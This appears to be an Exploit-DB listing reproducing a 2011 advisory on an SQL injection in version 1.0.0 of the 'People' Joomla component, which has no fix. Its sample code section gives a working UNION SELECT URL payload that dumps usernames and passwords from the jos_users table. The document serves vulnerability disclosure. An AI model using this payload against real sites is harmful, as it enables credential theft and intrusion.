header-logo
Suggest Exploit
vendor:
People
by:
Salvatore Fresta aka Drosophila
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: People
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:ptt-solution:people
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

People Joomla Component 1.0.0 SQL Injection Vulnerability

A parameter is not properly sanitised before being used in SQL queries, which can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

No fix.
Source

Exploit-DB raw data:

People Joomla Component 1.0.0 SQL Injection Vulnerability

 Name              People
 Vendor            http://www.ptt-solution.com
 Versions Affected 1.0.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2011-01-14

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

The component shows all of your people in a  professional
scroll  bar  where  visitors  take the first attention to
their looks and positions.


II. DESCRIPTION
_______________

A parameter is not properly sanitised  before  being used
in SQL queries.


III. ANALYSIS
_____________

Summary:

 A) SQL Injection
 

A) SQL Injection
________________

The id parameter is not  properly  sanitised before being
used in SQL queries.  This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) SQL Injection

http://site/path/index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT username,password,3 FROM jos_users


V. FIX
______

No fix.